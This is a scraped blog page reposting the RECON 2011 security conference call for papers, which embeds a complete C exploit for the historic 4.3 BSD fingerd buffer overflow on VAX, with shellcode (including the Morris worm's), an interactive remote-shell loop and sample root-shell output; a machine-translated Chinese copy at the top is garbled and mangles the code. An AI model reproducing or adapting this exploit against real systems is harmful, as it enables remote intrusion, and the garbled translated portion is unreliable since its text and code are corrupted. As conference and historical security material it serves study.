2011年侦察报告征集文件.

释放双眼,带上耳机,听听看~!

RECON 2011 Call For Papers,Concon 2011呼唤论文,“KDSP”Concon 2011呼唤论文-Concon是7月8日至10日在蒙特利尔市中心举行的一次安全会议,

/*+++++++++++/+++++++++/++++++++++++++++-,+++++。:. /=\ _|===|_ ||::| | | _|. | | | | | | __===_ -=- ||::| |==| | | __ |.:.| /\| |:. | | | | .|| : |||::| | |- |.:|_|. :__ |.: |–|==| | .| |_ | ‘ |. ||. |||:.| __|. | |_|. | |.|…||—| |==| | | | |_–. || |||. | | | | |. | | |::.||: .| |==| | . : |=|===| :|| . ||| .| |:.| .| | | | |:.:|| . | |==| | |=|===| . |’ | | | | | | | |’ : . | ; ; ‘ | ‘ : ` : ‘ . ‘ . . : ‘ . 报告编号2 0 1 1。` . . ‘ . C F P 0000000 REC0N 2011(http://recon.cx)0000020 7月8日-10 0000040凯悦酒店(新场地)0000060 M0NTREAL 00000100 0000120+REC0N 2011 0000140-会议和培训0000160-无审查,无销售宣传0000200-2010年的视频将上线0000220000240+现在接受提交0000260-单轨0000300-60分钟和30分钟的时隙0000320-派对闪电会谈000034000360+主要主题0000400-反向工程和/或利用:0000420+软件0000440-恶意软件0000460-保护/DRM0000500-防倒车0000520-静态/运行时分析0000540+硬件0000560-嵌入式设备、控制台、femtocell 0000600-手机0000620-RFID、SDR(软件无线电)0000640-侧信道攻击0000660-物理安全(摄像头,访问控制)0000700+协议0000720-GSM/CDMA0000740 0000760+对us 0001000也有兴趣-隐私0001020+反审查0001040+反监视0001060+匿名0001100+反取证0001120001140+任何其他精英0001160001200+请包括0001220-简短摘要0001240-姓名或别名0001260-联系方式0001300-Bio 0001320001340+重要日期0001360-培训/会议注册于2011年3月20日开始0001400-第一轮选拔:2011年4月10日0001420-CFP于5月15日结束,2011 0001440001460+发送提交到0001500-cfp2011@recon.cx 0001520001540+演讲者/与会者隐私0001560-recon不要求演讲者使用真实姓名0001600-recon不向第三方提供与会者或演讲者信息0001620(注册/付款所需的除外)*w0rd,n0w ph0r th3 g00dz。。*[十二月]不要私自分发!!!侦察机cx(lol),序列号,弗拉维亚,曼蒙,m1x,马德鲁库兹,xmux,sexchart的当前维护者,so1o*,newsham,lcamtuf,Ilfak,archive.org,m4tr1x,u4ea,Acid Phreak,Acid BuRN,Bi好奇的乔治,hypatia,tdz,Lady Gaga,Lindsay Lohan,gov boi,jennicide,netw1z,Johnny Lee Miller,pluvius,rtm,dasúmodem,imm,w1z4rd,l0renz,Subgraph&the Future Crew*a1ght,s0 ch3k1t,jU$t f0ll0w th3z3 E-Z st3pz*st3p 1:c0mp1l3*st3p 2:cl0z3 uR 3y3z&r3c1t3 th3 ph0ll0w1ng s4kr3d m4ntr4 OLD WAREZ=NO WAREZ;)*st3p 3:./dr0pv4x[目标]偏移量+pr3st0+$。/dropvax X.X.X.X-12345[+]ATDTX.X.X.X[+]连接9600[+]返回地址:0xUWISH[*]为小端拱编译。[+]已发送负载。。。[+]炮弹!4.3 BSD UNIX#3:Sat Feb 14 20:31:03 PST 2004 16:56 up 6:08,1 user,load average:0.09,0.06,0.03 user tty from login@idle JCPU PCPU what root co 10:49 1-sh-if whoami:root警告:无法访问tty;因此此shell中没有作业控制。。。负责的D3JNZY 3FN3T和TH3 Pr3ZH PR1NC3 0F B3LLK0R3负责披露:++W3H4V3 P3R$ BN0K3N BR0K3N TH1 $ Ext01T 1n A W4Y TH4T1Z M0R3-TH4N-S1MPL3 T0 F1X(1 BR0K3N L1N3)WTH 1NPH00RM4T10N PR0V1D3D 1N TH3K0MM3NTZ++*[DEC]不分发私密!!!出口K P8CE 0UT[十二月]*(仅限研究目的!!!)*/#在wap(value)(value)#endif extern in t errno;int try}u finger(char*,int);void fdsh(int);uint32}ttypedef u32;#ifndef USE_ALTERNATE_SHELLCODE/*VAX-11 SHELLCODE w/explanation*/*execve(“/bin/sh”,空,空)-利用4.3 BSD UNIX虚拟机。它总是将进程入口点(_start)放在地址0x00000000处。这给了我们有效的内存(一个零字节字符串,因为前两个字节的过程,如VAX上的start(那些用“callg”instr调用的过程)是保存的寄存器掩码,在start的情况下,这是零(无关紧要)。此外,kern_exec.c中的这一行检查是否:if(ap==NULL&&uap->envp){uap->argp=NULL。。。}所以我们不需要地址为零的有效argv。请参阅VAX架构参考手册(VARM)或VAX Arcitecture手册。http://www.bitsavers.org/pdf/dec/vax/archSpec具有VARM的内部版本的副本,这将有助于解释堆栈帧和指令集。*/对于内核,0x3b=execve)*/“\026\357\353“/*jsb外壳代码+0x4(PC相关)*/”\377\377\377“/bin/sh”;/*.asciz“/bin/sh”*/\else/*使用备用外壳代码*/*RTMorris Internet蠕虫(1988)*/*如果您认为外壳代码是问题所在,请尝试此操作。*/u32 shellcode[]={bswap(0x732f8fdd),bswap(0x8fdd0068),bswap(0x6e69622f),bswap(0xdd5a5ed0),bswap(0xdd00dd00),bswap(0xd003dd5a),bswap(0x3bbc5c5e)};#endif#define Send(str)Send(sock,(str),strlen(str),0)void fdsh(int sock){printf([+]Sent payload…\n”);sleep(1);Send(“echo”[+]Shell!’,空,空,空)<0{perror(“select”);return;}if(FD椆ISSET(0,&fds)){nb=read(0,buf,sizeof(buf));if(nb<=0){perror(“read(2)”);return;}send(sock,buf,nb,0);}if(FD椆ISSET(sock,fds)){nb=read(sock,buf,sizeof(buf));if(nb<=0){perror(“read(2)”;return;}write(1,buf,nb);}}}/*这个例程利用VAX中一个固定的512字节输入缓冲区来运行BSD 4.3 fingerd二进制文件。它发送536字节(加上一个换行符)来覆盖堆栈帧中的六个额外单词,包括return*PC,以指向发送过来的字符串的中间。字符串中的指令*执行execve(“/bin/sh”)的直接系统调用版本。*/(一)有权使用;/*(2)在;n“,inet_ntoa(sin.sin_addr));如果(连接,(void*)&sin,sizeof(sin))<0{perror(“connect(2)”);printf(”,网络安全教程RECON 2011 Call For Papers,

RECON 2011 Call For Papers – RECON is a security conference taking place in downtown Montreal from July 8th through the 10th.

,/*
+ + + +
+ + +
+ +
\ /
+ _ - _+_ - ,__
_=. .:. /=\ _|===|_ ||::|
| | _|. | | | | | | __===_ -=- ||::|
|==| | | __ |.:.| /\| |:. | | | | .|| : |||::|
| |- |.:|_|. :__ |.: |--|==| | .| |_ | ' |. ||. |||:.|
__|. | |_|. | |.|...||---| |==| | | | |_--. || |||. |
| | | |. | | |::.||: .| |==| | . : |=|===| :|| . ||| .|
|:.| .| | | | |:.:|| . | |==| | |=|===| . |' | | |
| | | | |' : . | ; ; ' |
' : ` : ' . ' . . :
' . R E C O N 2 0 1 1 .
` . . '
. C F P

0000000 REC0N 2011 (http://recon.cx)
0000020 JULY 8-10
0000040 HYATT REGENCY (New venue)
0000060 M0NTREAL
0000100
0000120 + REC0N 2011
0000140 - Conference and training
0000160 - No censorship, no sales pitches
0000200 - Videos from 2010 are coming online
0000220
0000240 + Now accepting submissions
0000260 - Single track
0000300 - 60 & 30 minute time slots
0000320 - Lightning talks at the party
0000340
0000360 + Primary topics
0000400 - Reverse engineering and/or exploitation:
0000420 + Software
0000440 - Malware
0000460 - Protection/DRM
0000500 - Anti-reversing
0000520 - Static/runtime analysis
0000540 + Hardware
0000560 - Embedded devices, consoles, femtocell
0000600 - Cellphones
0000620 - RFID, SDR (software defined radio)
0000640 - Side channel attacks
0000660 - Physical security (cameras, access control)
0000700 + Protocol
0000720 - GSM / CDMA
0000740
0000760 + Also of interest to us
0001000 - Privacy
0001020 + Anti-censorship
0001040 + Anti-surveillance
0001060 + Anonymity
0001100 + Counter-forensics
0001120
0001140 + Anything else elite
0001160
0001200 + Please include
0001220 - Short summary
0001240 - Name or alias
0001260 - Contact information
0001300 - Bio
0001320
0001340 + Important dates
0001360 - Training/conference registration opens March 20, 2011
0001400 - First round of selections: April 10, 2011
0001420 - CFP closes May 15, 2011
0001440
0001460 + Send submissions to
0001500 - cfp2011 @ recon.cx
0001520
0001540 + Speaker / attendee privacy
0001560 - Recon does not require speakers use their real names
0001600 - Recon does not provide attendee or speaker information to third-parties
0001620 (except where necessary for registration/payment)

* w0rd, n0w ph0r th3 g00dz..
* [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC]
*
* dr0pv4x.c
* t0p-s3kR1t w4r3z k0m1n' @ ya
* str8 fr0m the k0d3l1n3
* -th3 phr3zh pr1nc3 0f b3llk0r3

* w8, b4 i ph0rg3t, 3t3rn4l sh0utz 2:

route/daemon9, sw_r, Phiber Optik, Mendax, The Last Stage of Delirium (sup guys), 8lgm,
klog[ADM], luvz2chat, netl1nk, l0r3nz0, dmk, root@vax.recon.cx (lol), SN, Fravia, Mammon_,
m1x, madruquz, xmux, the current maintainer of the sexchart, so1o*, newsham, lcamtuf, Ilfak,
archive.org, m4tr1x, u4ea, Acid Phreak, ACiD BuRN, Bi-Curious George, hypatia, tdz, Lady Gaga,
Lindsay Lohan, gov-boi, jennicide, netw1z, Johnny Lee Miller, pluvius, rtm, das_modem, imm,
w1z4rd, l0renz, Subgraph & The Future Crew

* a1ght, s0 ch3k1t, jU$t f0ll0w th3z3 E-Z st3pz

* st3p 1: c0mp1l3

* st3p 2: cl0z3 uR 3y3z & r3c1t3 th3 ph0ll0w1ng s4kr3d m4ntr4

OLD WAREZ = NO WAREZ ;)

* st3p 3: ./dr0pv4x [target] offset

+ pr3st0 +

$ ./dropvax X.X.X.X -12345
[+] ATDT X.X.X.X
[+] CONNECT 9600
[+] Return address: 0xUWISH
[*] Compiled for little-endian arch.
[+] Sent payload...
[+] Shell!
4.3 BSD UNIX #3: Sat Feb 14 20:31:03 PST 2004
16:56 up 6:08, 1 user, load average: 0.09, 0.06, 0.03
User tty from login@ idle JCPU PCPU what
root co 10:49 1 -sh -if
whoami:
root
Warning: no access to tty; thus no job control in this shell...
# exit

k p8ce 0ut,
- dj j4zzy 3fn3t & th3 phr3zh pr1nc3 0f b3llk0r3

Responsible Disclosure:

++w3 h4v3 p3r$0n4lly br0k3n th1$ expl01t 1n a w4y th4t 1z m0r3-th4n-s1mpl3 t0
f1x (1 br0k3n l1n3) w1th th3 1nph0rm4t10n pr0v1d3d 1n th3 k0MM3ntz++

* [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC] *
(research purposes only!!!)
*/

#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <errno.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef BIG_ENDIAN_ARCH

#define bswap(value) \
(((u32) (value)) << 24 |\
(((u32) (value)) & 0x0000FF00) << 8 |\
(((u32) (value)) & 0x00FF0000) >> 8 |\
((u32) (value)) >> 24)

#else

#define bswap(value) (value)

#endif

extern int errno;

int try_finger(char *, int);
void fdsh(int);

uint32_t typedef u32;

#ifndef USE_ALTERNATE_SHELLCODE /* VAX-11 shellcode w/ explanation */

/* execve("/bin/sh", NULL, NULL) -
Take advantage of the 4.3 BSD UNIX VM.
It always puts the process entry point (_start) at address 0x00000000.
This gives us valid memory (a zero-byte string, since the first two bytes
of procedures like _start on VAX (those called with "callg" instr.) are
the saved register-mask, and in _start's case this is zero (does not matter).
Furthermore, this line in kern_exec.c checks if:

if (ap == NULL && uap->envp) {
uap->argp = NULL;
...
}

So we don't need a valid argv at address zero.
See the VAX Architecture Reference Manual (VARM) or the
VAX Arcitecture Handbook.

http://www.bitsavers.org/pdf/dec/vax/archSpec has a copy
of the internal version of the VARM,
which will help explain the stack frame and the instruction set.
*/

unsigned char shellcode[] =
"\021\017" /* brb shellcode+0x11 (PC-relative) */
"\272\001" /* popr $0x1 (this is a mask: pop one word into r0) */
"\335\000\335\000" /* pushl $0 ; pushl $0 */
"\335P" /* pushl %r0 (address of /bin/sh string) */
"\335\003" /* pushl $0x3 */
"\320^\\" /* movl %sp, %ap */
"\274;" /* chmk $0x3b (change mode to kernel, 0x3b = execve) */
"\026\357\353" /* jsb shellcode+0x4 (PC-relative) */
"\377\377\377"
"/bin/sh"; /* .asciz "/bin/sh" */

#else /* USE_ALTERNATE_SHELLCODE */ /* RTMorris Internet Worm (1988) */

/* If you think the shellcode is the problem, try this one. */

u32 shellcode[] =
{
bswap(0x732f8fdd),
bswap(0x8fdd0068),
bswap(0x6e69622f),
bswap(0xdd5a5ed0),
bswap(0xdd00dd00),
bswap(0xd003dd5a),
bswap(0x3bbc5c5e)
};

#endif

#define Send(str) send(sock, (str), strlen(str), 0)

void fdsh(int sock)
{
printf("[+] Sent payload...\n");

sleep(1);
Send("echo '[+] Shell!'; PATH=$PATH:/etc:/bin:/usr/bin:/usr/ucb:/usr/new:/usr/old\n");
Send("export PATH\n");
Send("strings /vmunix | fgrep UNIX\n");
Send("w ; echo whoami: ; whoami; exec csh -if\n");

for (;;) {
fd_set fds;
char buf[2048];
int nb;

FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
if (select(sock + 1, &fds, NULL, NULL, NULL) < 0) {
perror("select");
return;
}
if (FD_ISSET(0, &fds)) {
nb = read(0, buf, sizeof(buf));
if (nb <= 0) {
perror("read(2)");
return;
}
send(sock, buf, nb, 0);
}
if (FD_ISSET(sock, &fds)) {
nb = read(sock, buf, sizeof(buf));
if (nb <= 0) {
perror("read(2)");
return;
}
write(1, buf, nb);
}
}
}

/* This routine exploits a fixed 512 byte input buffer in a VAX running
* the BSD 4.3 fingerd binary. It send 536 bytes (plus a newline) to
* overwrite six extra words in the stack frame, including the return
* PC, to point into the middle of the string sent over. The instructions
* in the string do the direct system call version of execve("/bin/sh"). */

/* From sp4f ^^^^^^^ (lolololol) */

/*
* Here's what the VAX-11 stack frame looks like (from 4.3 BSD's <vax/frame.h>:
*/
#if 0
struct frame {
int fr_handler;
u_int fr_psw:16, /* saved psw */
fr_mask:12, /* register save mask */
:1,
fr_s:1, /* call was a calls, not callg */
fr_spa:2; /* stack pointer alignment */
int fr_savap; /* saved arg pointer */
int fr_savfp; /* saved frame pointer */
int fr_savpc; /* saved program counter */
};
#endif

int try_finger(char *host, int offset)
{
int s, i;
struct sockaddr_in sin = { 0 };
u32 retaddr = 0x7fffe8a8 - offset;
char buf[536];

sin.sin_family = PF_INET;
sin.sin_port = htons(79);
sin.sin_addr.s_addr = inet_addr(host);

if (sin.sin_addr.s_addr == -1) {
struct hostent *h;
h = gethostbyname(host);
if (h == NULL) {
herror("gethostbyname(3)");
return -1;
}
bcopy(h->h_addr, &sin.sin_addr, sizeof(u32));
}

if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
perror("socket(2)");
return -1;
}

printf("[+] ATDT %s\n", inet_ntoa(sin.sin_addr));

if (connect(s, (void *)&sin, sizeof(sin)) < 0){
perror("connect(2)");
printf("[-] NO DIALTONE\n");
return -1;
}

printf("[+] CONNECT 9600\n");

for (i = 0; i < 400; i++)
buf[i] = '\001'; /* VAX-11 NOP */

bcopy(shellcode, buf + 400, sizeof(shellcode));

for (i = 400 + sizeof(shellcode); i < sizeof(buf); i++)
buf[i] = '\0'; /* VAX-11 HALT, try not to land on one. */

printf("[+] Return address: %#x\n", retaddr);

#ifdef BIG_ENDIAN_ARCH
printf("[*] Compiled for big-endian arch.\n");
#else
printf("[*] Compiled for little-endian arch.\n");
#endif

*((u32 *)buf + 128) = bswap(0x7fffeab0);
*((u32 *)buf + 129) = bswap(0x7fffeb60);
*((u32 *)buf + 130) = bswap(0x20000000);
*((u32 *)buf + 131) = bswap(0x7fffeb64);
*((u32 *)buf + 132) = bswap(retaddr);
*((u32 *)buf + 133) = 0;

send(s, buf, sizeof(buf), 0); /* sizeof (buf) == 536 */
send(s, "\n", 1, 0);

fdsh(s);
printf("[-] NO CARRIER\n");
return 0;
}

main(int c, char **v)
{
char *host = v[1], *ofs = v[2];

if (!*(++v)) {
fprintf(stderr, "usage: %s hostname [offset]\n", *(--v));
exit(1);
}

if (c > 2)
try_finger(host, atoi(ofs));
else
try_finger(host, 0);

exit(0);
}

人已赞赏
安全工具

Heap Spray Attack Whitepaper

2020-2-6 3:47:25

安全工具

<p>2010年度研究——数据泄露的美国成本.</p>

2020-2-6 3:47:27

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索